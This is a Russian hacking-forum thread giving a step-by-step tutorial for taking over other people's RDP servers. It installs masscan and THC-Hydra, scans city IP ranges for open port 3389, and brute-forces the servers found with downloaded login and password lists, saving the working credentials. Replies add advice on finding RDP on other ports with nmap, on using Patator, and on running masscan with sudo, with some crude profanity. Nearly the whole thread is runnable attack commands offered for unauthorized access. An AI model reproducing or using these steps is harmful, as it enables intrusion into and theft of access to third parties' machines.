Брутим дедики на Linux!

VzlomJopy

Пользователь
Подтвержденный
Закрытый раздел
Сообщения
85
Откроем консоль,установим!

Установка masscan в Debian, Mint, Ubuntu
sudo apt-get install git gcc make libpcap-dev
git clone https://github.com/robertdavidgraham/masscan
cd masscan
make
Установка Трехглавый и зависимостей
sudo apt-get install libssl-dev libssh-dev libidn11-dev libpcre3-dev libgtk2.0-dev libmysqlclient-dev libpq-dev libsvn-dev firebird2.1-dev libncp-dev
git clone https://github.com/vanhauser-thc/thc-Трехглавый.git
cd thc-Трехглавый/
./configure
make
sudo make install

Начнем.. Теперь нам понадобятся цели, я возьму ip диапазон для скана портов на сайте IP диапазоны городов и сохраню в домашний каталог в файл iprdp.txt
Теперь ip диапазон который взяли будем сканить дефолтный порт RDP 3389

masscan -iL iprdp.txt --open -p3389 -oL result.txt

Если нужен чистый список одних ip без мусора для масс брута то будет так
masscan -iL iprdp.txt --open -p3389 | awk '{print $6}' > result.txt

-oL - результат
-iL - файл с диапазонами которые будем сканить
--open - только открытые порты
-p - порт который сканить
мусора в домашний каталог в файл result.txt
Скан закончился, нашел 6 штук с открытым портом RDP, смотрим файл result.txt это будут наши таргеты!
Теперь нам необходимо взять логины и пароли которые дадим Гидре. Скачать можете ТУТ

Итак приступим к бруту! Вводим следующую команду.
Трехглавый -L loginr.txt -P passrdp.txt -M result.txt -s 3389 rdp vV -o GOODRDP.txt
-L - список логинов , -l один логин
-P - список паролей
-M -файл список целей
-V - вывод в пары логин и пароль в консоль при каждой попытке
Другие ключи можете посмотреть командой Трехглавый -hh
-o - файл куда сохранятся гуды!
 
Ну блять хуй знает на самом деле.
Я думаю лучше сначала диапазон прогнать нмапом и посмотреть рдп на других портах. Зачастую админы вешают рдп на другие порты и думают, что ахуенно защитились, а нмап умеет определять, что висит на порту.
А 3389 сейчас брутит блять вся школота, комп висит с внешним адресом, смотрю лог безопасности - там пиздец полный, Такое ощущние, что брутят все по одному словарю. Тоже мне, брутеры ебаный ты в рот.
 
Да я знаю, это изи, пока так пойдет, нмапом тож можно, а так вообще брутить удобнее и более обширные настройки имеет Patator, лично мне он привычнее и удобнее и стабильнее
 
└─$ masscan -iL ip2.txt --open -p3389 -oL result.txt
[-] FAIL: permission denied
[hint] need to sudo or run as root or something
[-] if:eth0:init: failed
с линухой вообще на ты айте пинка пжл чего не так то
 
проблему решил надо было написать sudo перед запуском
 
был бы очень признателен если бы вы об этом рассказали))))
 
Назад
Сверху